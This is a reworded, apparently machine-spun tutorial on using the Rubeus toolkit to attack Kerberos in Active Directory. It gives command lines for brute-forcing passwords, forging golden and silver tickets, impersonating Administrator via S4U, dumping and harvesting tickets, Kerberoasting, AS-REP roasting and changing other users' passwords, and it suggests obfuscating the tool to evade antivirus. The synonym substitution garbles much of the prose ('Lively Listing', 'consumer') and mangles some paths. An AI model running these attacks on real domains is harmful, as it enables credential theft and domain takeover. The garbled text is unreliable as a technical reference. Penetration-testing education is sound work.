Introduction
Rubeus is a C# toolkit for Kerberos interplay and abuses. Kerberos, as everyone knows, is a ticket-based community authentication protocol and is utilized in Lively Directories. Sadly, resulting from human error, oftentimes AD isn’t configured correctly conserving safety in thoughts. Rubeus can exploit vulnerabilities arising out of those misconfigurations and carry out features comparable to crafting keys and granting entry utilizing cast certificates. The article serves as a information on utilizing Rubeus in numerous situations.
Desk of content material
- Kerberos Authentication Move
- Kerberos & its Main Elements
- Kerberos Workflow utilizing Messages
- Service Principal Identify SPN
- Rubeus Setup
- Ticket Operations
- Asktgt
- Asktgs
- Klist
- Renew
- Brute
- Hash
- S4u
- Golden Ticket
- Silver Ticket
- Ticket Administration
- Ptt
- Purge
- Describe
- Triage
- Dump
- Tgtdeleg
- Monitor
- Harvest
- Kerberoasting
- ASREPRoast
- Createnetonly
- Changepw
- Currentluid
- Conclusion
Kerberos Authentication Move
Kerberos and its Main Elements
The Kerberos protocol defines how shoppers work together with a community authentication service. Purchasers receive tickets from the Kerberos Key Distribution Heart (KDC), they usually submit these tickets to software servers when connections are established. It makes use of UDP port 88 by default and will depend on the method of symmetric key cryptography.
“Kerberos makes use of tickets to authenticate a consumer and utterly avoids sending passwords throughout the community”.
There are some key parts in Kerberos authentication that play an important position in all the authentication course of.
Kerberos Workflow utilizing Messages
Within the Lively Listing area, each area controller runs a KDC (Kerberos Distribution Heart) service that processes all requests for tickets to Kerberos. For Kerberos tickets, AD makes use of the KRBTGT account within the AD area.
The picture beneath exhibits that the key position performed by KDC in establishing a safe connection between the server & consumer and all the course of makes use of some particular parts as outlined within the desk above.
As talked about above, Kerberos makes use of symmetric cryptography for encryption and decryption. Allow us to get into extra particulars and attempt to perceive how encrypted messages are despatched to one another. Right here we use three colors to tell apart Hashes:
- BLUE _KEY: Consumer NTLM HASH
- YELLOW_KEY: Krbtgt NTLM HASH
- RED_KEY: Service NTLM HASH
Step 1: By sending the request message to KDC, consumer initializes communication as:
KRB_AS_REQ incorporates the next:
- Username of the consumer to be authenticated.
- The service SPN (SERVICE PRINCIPAL NAME) linked with Krbtgt account
- An encrypted timestamp (Locked with Consumer Hash: Blue Key)
Your complete message is encrypted utilizing the Consumer NTLM hash (Locked with BLUE KEY) to authenticate the consumer and stop replay assaults.
Step 2: The KDC makes use of a database consisting of Customers/Krbtgt/Providers hashes to decrypt a message (Unlock with BLUE KEY) that authenticates consumer identification.
Then KDC will generate TGT (Ticket Granting Ticket) for a consumer that’s encrypted utilizing Krbtgt hash (Locked with Yellow Key) & some Encrypted Message utilizing Consumer Hash.
KRB_AS_REP incorporates the next:
- Username
- Some encrypted information, (Locked with Consumer Hash: Blue Key) that incorporates:
- Session key
- The expiration date of TGT
- TGT, (Locked with Krbtgt Hash: Yellow Key) which incorporates:
- Username
- Session key
- The expiration date of TGT
- PAC with consumer privileges, signed by KDC
Step 3: The KRB_TGT might be saved within the Kerberos tray (Reminiscence) of the consumer machine, because the consumer already has the KRB_TGT, which is used to determine himself for the TGS request. The consumer despatched a duplicate of the TGT with the encrypted information to KDC.
KRB_TGS_REQ incorporates:
- Encrypted information with the session key
- TGT
- SPN of requested service e.g. SQL service
Step 4: The KDC receives the KRB_TGS_REQ message and decrypts the message utilizing Krbtgt hash to confirm TGT (Unlock utilizing Yellow key), then KDC returns a TGS as KRB_TGS_REP which is encrypted utilizing requested service hash (Locked with Crimson Key) & Some Encrypted Message utilizing Consumer Hash.
KRB_TGS_REP incorporates:
- Username
- Encrypted information with the session key:
- The expiration date of TGS
- TGS, (Service Hash: RED Key) which incorporates:
- Service session key
- Username
- The expiration date of TGS
- PAC with consumer privileges, signed by KDC
Step 5: The consumer despatched the copy of TGS to the Utility Server,
KRB_AP_REQ incorporates:
- TGS
- Encrypted information with the service session key:
- Username
- Timestamp, to keep away from replay assaults
Step 6: The applying makes an attempt to decrypt the message utilizing its NTLM hash and to confirm the PAC from KDC to determine consumer Privilege which is an optionally available case.
Step 7: KDC verifies PAC (Elective)
Step 8: Permit the consumer to entry the service for a selected time.
Service Principal Identify
The Service Principal Identify (SPN) is a novel identifier for a service occasion. Lively Listing Area Providers and Home windows present assist for Service Principal Names (SPNs), that are key parts of the Kerberos mechanism via which a consumer authenticates a service.
Essential Factors
- For those who set up a number of situations of a service on computer systems all through a forest, every occasion will need to have its SPN.
- Earlier than the Kerberos authentication service can use an SPN to authenticate a service, the SPN should be registered on the account.
- A given SPN might be registered on just one account.
- An SPN should be distinctive within the forest wherein it’s registered.
- If it’s not distinctive, authentication will fail.
The SPN syntax has 4 parts
Sort of SPN:
- Host-based SPNs which is related to the pc account in AD, it’s randomly generated 128-character lengthy password which is modified each 30 days; therefore it’s no use in Kerberoasting assaults
- SPNs which were related to a website consumer account the place NTLM hash might be used.
Rubeus setup
Greek mythology mentions a three-headed canine known as “Cerberus” which sounds just like “Kerberos” (possibly even the inspiration for the identify!). Harry Potter additionally mentions a three-headed canine known as “fluffy” that belonged to and might be managed by Hagrid whose full identify was Rubeus Hagrid. With a reputation cleverly primarily based on Sci-Fi and mythology, Rubeus is a device, developed by Will Schroeder and some different contributors, that assaults Kerberos and is able to producing uncooked Kerberos information on UDP port 88. It’s derived from Mimikatz and MakeMeEnterpriseAdmin initiatives. It may be downloaded right here.
Please notice that the latest Rubeus binary might be compiled from code through the use of Visible Studio however a launch for ease of use can be discovered right here.
Detection: Because of the utilization of generic features and derivation from Mimikatz (kekeo household of malware as per CARO) and set procedures, its signatures are by default blocked in lots of anti-viruses. Plus, Rubeus works as a dropped executable and so, a intelligent attacker must obfuscate Rubeus to cover its detection as quickly because it’s dropped on the disk.
As soon as downloaded, it may be dropped on the sufferer’s system and run
rubeus.exe
Now that now we have set it up, we’re able to reveal numerous choices in Rubeus.
Ticket Operations
Working in an Lively Listing surroundings will depend on numerous tickets. For instance, a Ticket Granting Ticket is an authentication token issued by the KDC which is used to request entry from TGS for particular sources.
On this part, we’ll speak about Rubeus and its functionality to mess around with tickets.
Asktgt
Rubeus can generate uncooked AS-REQ visitors so as to ask for a TGT with a offered username and password. The password can be encrypted in RC4, AES or DES encryption and it might nonetheless work. Let’s see an instance the place clear-text password is equipped
rubeus.exe asktgt /consumer:harshitrajpal /password:[email protected]
As you’ll be able to see above {that a} KRBTGT has been efficiently generated which might be additional used to generate TGS. The identical might be achieved by offering an encrypted password. Let’s use a password encrypted with the RC4 cipher.
rubeus.exe asktgt /consumer:harshitrajpal /rc4:64FBAE31CC352FC26AF97CBDEF151E03
Asktgs
Rubeus has an asktgs possibility which may construct uncooked TGS-REP requests by offering a ticket both within the CLI argument or by offering a path to a ticket.kirbi file positioned on disk. Every TGS has a specified function.
For instance, let’s create a TGS for the LDAP service. A number of service SPNs might be offered.
rubeus.exe asktgs /consumer:harshitrajpal /ticket:doIFNDCCBTCgAwIBB...bA== /service:LDAP/dc1.ignite.native
By offering within the TGT we generated within the earlier step (copying in notepad and eradicating enters to kind the ticket in a single line) now we have generated a TGS efficiently.
Klist
Klist command in Home windows can be utilized to view the tickets generated within the system. Right here, once we run klist command we will see {that a} KRBTGT and an LDAP TGS have been generated and saved within the session.
Renew
The renew operate in Rubeus builds a TGT renewal alternate. We will specify a website controller utilizing the /dc flag which might be used as a vacation spot for the renewal visitors. We will additional use the tgtdeleg possibility with this and extract consumer’s credentials with out elevation and maintain it alive on one other system for per week by default.
/ptt flag can be utilized in conjunction to use the Kerberos
rubeus.exe renew /dc:dc1.ignite.native /ticket:doIFNDCCB....bA==
/autorenew sub operate will put the alternate to sleep for endTime half-hour and after that window routinely renew the TGT and show the renewed ticket
rubeus.exe renew /dc:dc1.ignite.native /autorenew /ticket:doIFNDCCBTCgAw...bA==
As it’s possible you’ll now observe that after a specified time interval a renewed TGT is proven
Brute
The brute possibility in Rubeus can be utilized to carry out a password bruteforce assault towards all the prevailing consumer accounts in Lively Listing. Many instances, the identical password is used with a number of accounts in real-life enterprise infrastructure. So, brute possibility can generate a number of TGTs in these accounts having the identical password. /noticket can be utilized along with this selection since no ticket is supplied with this performance. For instance,
rubeus.exe brute /password:[email protected] /noticket
Hash
Rubeus is able to taking in passwords and producing hashes of them. These are of various codecs together with NTLM (rc4_hmac) hash. To do that, we will use a hash operate and supply a website utilizing /area, an account’s identify (generally is a machine account too) utilizing the/consumer flag and the password utilizing /password.
rubeus.exe hash /consumer:harshitrajpal /area:ignite.native /password:[email protected]
As you’ll be able to see 4 completely different hashes have been output. Numerous encryption ciphers are used along with widespread hashing methods. All of those ciphers are supported in AD surroundings and therefore, could also be used for various functions.
S4u
We noticed above how we will generate hashes utilizing Rubeus. Now let’s speak about one such assault the place hashes can be utilized to impersonate one other consumer and perform delegation assaults. For an in depth write-up on delegation, and assaults observe the hyperlink right here. Briefly, OS post-Home windows server 2003 contained a Kerberos protocol extension known as s4uself and s4uproxy. These protocols can be utilized to conduct delegation assaults. For instance, within the instance beneath, now we have carried out an assault known as “Useful resource-Based mostly Constrained Delegation” which advantages the msDS-AllowedToActOnBehalfOfAnotherIdentity possibility set within the attribute’s editor. Observe the article right here for a full assault. Within the instance beneath, we’ll use the consumer noob’s hash after which impersonate Administrator account.
/rc4: flag is used to offer consumer noob’s account.
/impersonateuser: Consumer that might be impersonated by noob.
/msdsspn: A legitimate msDS-AllowedToActOnBehalfOfAnotherIdentity worth for the account. Right here, the area controller
/altservice: might be equipped to substitute a number of service names within the ensuing .kirbi file.
/ptt: Injects the ensuing ticket within the present terminal session
rubeus.exe s4u /consumer:noob$ /rc4:64FBAE31CC352FC26AF97CBDEF151E03 /impersonateuser:Administrator /msdsspn:host/dc1.ignite.native /altservice:cifs /area:ignite.native /ptt
This might generate a ticket for Administrator consumer over the desired SPN. Briefly, we will now act as DC.
Golden Ticket
Golden tickets are cast KRBTGTs (Key Distribution Service account) which can be utilized to forge different TGTs. This gives an attacker persistence over the area accounts. For an in depth walkthrough on the subject you’ll be able to go to the article right here.
To forge a golden ticket for consumer harshitrajpal, we first generate an AES hash (RC4 works too) utilizing the hash command in Rubeus after which utilizing the golden operate like so. Right here,
/ldap: Retrieves data of consumer over LDAP protocol
/consumer: Username whose ticket might be cast
/printcmd: shows a one liner command that can be utilized to generate the ticket once more that simply received generated
rubeus.exe hash /consumer:harshitrajpal /area:ignite.native /password:[email protected] rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ldap /consumer:harshitrajpal /printcmd
As you’ll be able to see numerous particulars like SID, userID, Service Key and so forth are being fetched over LDAP that are vital to generate a ticket. PAC signing can be completed and a TGT generated for harshitrajpal
Additionally, on the finish you’ll see a one liner command that can be utilized to generate this TGT once more.
Numerous different choices can be utilized along with golden to switch the generated TGT like:
/rangeinterval: After each time specified, a brand new ticket might be generated.
/rangeend: Specifies the utmost time tickets might be generated for. Right here, 5 days. Since rangeinterval is 1d, 5 completely different tickets might be generated.
For a full record of modifications, see this web page.
Silver Ticket
Silver tickets are cast Kerberos Ticket Granting Service (TGS) Tickets however with silver tickets there isn’t a communication with the area controller. It’s signed by the service account configured with an SPN for every server the Kerberos-authenticating service runs on. For extra particulars go to the web page right here.
Silver ticket assault might be carried out utilizing Rubeus utilizing silver operate. Different customisations want be made like:
/service: SPN of the service ticket is being generated for
/rc4: Hash of a legitimate consumer (harshitrajpal right here) which might be used to encrypt the generated ticket
/consumer: username of the consumer whose hash is offered
/creduser: Consumer to be impersonated
/credpassword: Password of the consumer to be impersonated
/krbkey: used to create the KDCChecksum and TicketChecksum. That is the AES256 hmac sha1 hash within the following case.
/krbenctype: kind of encrypted hash used. Aes256 right here.
rubeus.exe hash /consumer:harshitrajpal /area:ignite.native /password:[email protected] rubeus.exe silver /service:cifs/dc1.ignite.native /rc4:64FBAE31CC352FC26AF97CBDEF151E03 /ldap /creduser:ignite.localAdministrator /credpassword:[email protected] /consumer:harshitrajpal /krbkey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /krbenctype:aes256 /area:ignite.native /ptt
This helped us generate a silver ticker for Administrator account. And in consequence, we at the moment are in a position to entry DC machine’s C drive
dir dc1.ignite.localc$
Ticket Administration
Rubeus incorporates a number of ticket administration choices that will help a pentester to conduct operations successfully and stealthily. As a pentester, we have to handle our generated tickets.
Ptt
The Rubeus ptt possibility can import the equipped ticket in command line. The /ptt can be used along with different choices that output tickets. For instance,
rubeus.exe ptt /ticket:doIFNDCCBTCgAwI...bA==
As you’ll be able to see, the generated ticket has now been imported.
Purge
Rubeus has a purge possibility which may purge/delete all of the tickets present within the present session.
Right here, we reveal how we purged 2 tickets listed by klist.
rubeus.exe purge
Describe
Usually we lose monitor of the tickets in system. Describe possibility helps us to view particulars a couple of explicit base64 encrypted blob or ticket.kirbi file.
We will present the ticket utilizing /ticket flag.
rubeus.exe describe /ticket:doIFNDCCBTCg...bA==
Triage
Whereas klist views tickets for present session triage lists all of the tickets. When a session is being run as an administrator, we can’t solely view tickets within the present consumer’s session reminiscence however different consumer’s tickets in reminiscence too.
/luid: This flag can be utilized to offer a selected consumer ID.
rubeus.exe triage rubeus.exe triage /luid:0x8f57c
Additionally, when the LUID is thought, we will purge explicit consumer’s tickets too (elevated mode solely)
rubeus.exe purge /luid:0x8f57c
Dump
If the session is working in an elevated mode, a consumer can dump/ extract all the present TGTs and repair tickets. Once more, /luid might be offered to dump particular consumer’s tickets. /service can be utilized to filter these tickets.
For instance, /service:krbtgt shows solely TGTs.
rubeus.exe dump
For a selected service like solely krbtgt:
rubeus.exe dump /service:krbtgt
Tgtdeleg
Tgtdeleg is Benjamin Delpy’s method that may exploit the Generic Safety Service Utility Program Interface (GSS-API) trick and permits you to extract a usable TGT .kirbi file from the present consumer’s session in low elevation mode. This Home windows API can be utilized to request a delegate TGT that’s supposed to be despatched to a distant host/SPN.
This may be completed like:
rubeus.exe tgtdeleg
As you’ll be able to see, the present consumer’s TGT has been dumped efficiently.
Monitor
The monitor operate can periodically extract all TGTs each x seconds the place x is the variable offered within the /interval flag.
/targetuser: Solely the desired consumer’s tickets might be returned.
rubeus.exe monitor /targetuser:noob$ /interval:10
Harvest
The harvest possibility extracts TGTs each x seconds the place x is offered by /interval flag and it additionally retains a cache of any extracted TGTs and any tickets about to run out are autorenewed.
/nowrap filter: Shows tickets in a single line (very useful)
/runfor: Can specify the tip time of harvest possibility
rubeus.exe harvest /interval:30
Kerberoasting
Kerberoasting is a way that permits an attacker to steal the KRB_TGS ticket, that’s encrypted with RC4, to brute power software providers hash to extract its password. Kerberos makes use of NTLM hash of the requested Service for encrypting KRB_TGS ticket for given service principal names (SPNs). When a website consumer despatched a request for TGS ticket to area controller KDC for any service that has registered SPN, the KDC generates the KRB_TGS with out figuring out the consumer authorization towards the requested service.
An attacker can use this ticket offline to brute power the password for the service account because the ticket has been encrypted in RC4 with the NTLM hash of the service account.
For an in depth information on Kerberoasting, see our article right here.
To carry out Kerberoasting utilizing Rubeus for a specified SPN, we will present utilizing the /spn flag.
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native
As you’ll be able to see above, a legitimate Kerberos hash has been dumped by kerberoasting LDAP service. These might be cracked utilizing hashcat with module quantity 13100.
/tgtdeleg can be utilized to carry out the tgt delegation trick to roast all rc4 enabled accounts
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /tgtdeleg
/aes flag can be utilized to roast all AES enabled accounts whereas utilizing KerberosRequestorSecurityToken
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /aes
Alternate area credentials to carry out Kerberoasting and looking for customers to kerberoast might be completed utilizing the /creduser and /credpassword
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /creduser:ignite.localAdministrator /credpassword:[email protected]
Some customisation flags can be specified like
/pwdsetbefore: Within the format MM-dd-yyyy then solely the accounts whose password was final modified earlier than the desired date shall be roasted
/resultlimit: The variety of accounts that shall be roasted might be restricted to this worth
/delay: Specifies the miliseconds interval between two consecutive TGS requests
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /pwdsetbefore:08-05-2022 /resultlimit:3 /delay:1000
/rc4opsec: tgtdeleg trick is used and accounts with out AES enabled are roasted.
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /rc4opsec
/easy: hashes are output within the console one per line
/nowrap: with this selection Kerberos outcomes won’t be line wrapped
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /easy /nowrap
/outfile: Can be utilized to retailer the hash in an output file
rubeus.exe kerberoast /spn:ldap/dc1.ignite.native/ignite.native /outfile:kind.hash
ASREPRoast
A service ticket is obtained utilizing TGT and that TGT is obtained by validating a primary step known as “pre-authentication.” If this pre-authentication requirement is eliminated for accounts, it makes them weak to asreproasting.
If the consumer has “Don’t use Kerberos pre-authentication” enabled, then an attacker can get better a Kerberos AS-REP encrypted with the customers RC4-HMAC’d password and he can try and crack this ticket offline.
You may learn our detailed article right here.
An SPN might be specified with asreproast possibility like
rubeus.exe asreproast /spn:ldap/dc1.ignite.native/ignite.native
As you’ll be able to see, all of the accounts with setting “Don’t use Kerberos pre-authentication” enabled are weak to the assault and their AS-REP encrypted with RC4-HMAC password has been dumped.
These hashes can be dumped in a selected hashcat format. By default the hashes might be cracked utilizing JtR.
rubeus.exe asreproast /spn:ldap/dc1.ignite.native/ignite.native /format:hashcat
/area and /dc are optionally available flags that can be utilized to explicitly outline the area and controller accounts.
rubeus.exe asreproast /area:ignite.native /dc:dc1
/outfile can be utilized to avoid wasting this hash in an output file.
rubeus.exe asreproast /spn:ldap/dc1.ignite.native/ignite.native /outfile:type2.hash
If /ldaps is used, LDAP question shall go over secured LDAP (port 636)
rubeus.exe asreproast /consumer:harshitrajpal /ldaps
Createnetonly
The choice createnetonly makes use of the CreateProcessWithLogonW() API to create a brand new hidden course of whereas returning the ID and LUID. This LUID can then be used with ptt possibility to use this ticket within the newly created course of. This prevents erasing of present tickets.
/ticket flag can be utilized to offer kirbi ticket of base64 blob with the created course of.
rubeus.exe createnetonly /program:"C:WindowsSystem32upnpcont.exe" /ticket:ticket.kirbi
As you’ll be able to see, the method ID 3032 is related to this hidden course of and LUID given which can be utilized utilizing the /luid flag.
Changepw
The Rubeus changepw possibility permits an attacker to vary a consumer’s plaintext password from a TGT .kirbi file or a base64 blob. Therefore, when used along with tgtdeleg or asktgt, we will change a consumer’s password simply from it’s hash. For instance, let’s set present consumer’s password to “[email protected]!!!”
/ticket: we offered legitimate TGT of present consumer.
rubeus.exe changepw /ticket:doIFNDCC...bA== /new:[email protected]!!!
As you’ll be able to see, password for consumer ‘harshitrajpal’ has been modified efficiently.
Now, we will select a selected consumer which has the identical password utilizing the /targetuser possibility too (might be discovered utilizing the brute technique). Notice that crucial privileges could also be required right here.
rubeus.exe changepw /targetuser:ignite.localmufasa /ticket:doIFNDCC...bA== /new:[email protected]!!!
As you’ll be able to see, Mufasa had the identical password as harshitrajpal and his password received modified.
Currentluid
A easy choice to show present LUID. LUID might be utilised with different choices by specifying with the /luid flag. For instance, to purge ticket of a selected consumer, luid could also be wanted.
rubeus.exe currentluid
Conclusion
The article talked a couple of C# implementation of assorted widespread AD assaults coated in number of main initiatives like Kekeo known as “Rubeus.” It’s a versatile device which might be dropped on the sufferer’s machine and be used to carry out numerous AD associated assaults. We tried to cowl a majority of choices. An in depth wiki might be referred to right here. The article is meant to function a fast prepared reference for Rubeus utilization. Hope you appreciated the article. Thanks for studying.
Creator: Harshit Rajpal is an InfoSec researcher and left and proper mind thinker. Contact right here